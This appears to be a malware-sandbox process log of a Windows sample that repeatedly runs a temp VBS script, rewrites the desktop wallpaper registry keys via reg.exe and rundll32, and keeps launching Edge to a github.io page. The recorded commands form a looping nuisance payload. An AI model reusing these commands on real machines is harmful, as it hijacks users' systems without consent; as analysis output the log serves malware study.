reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

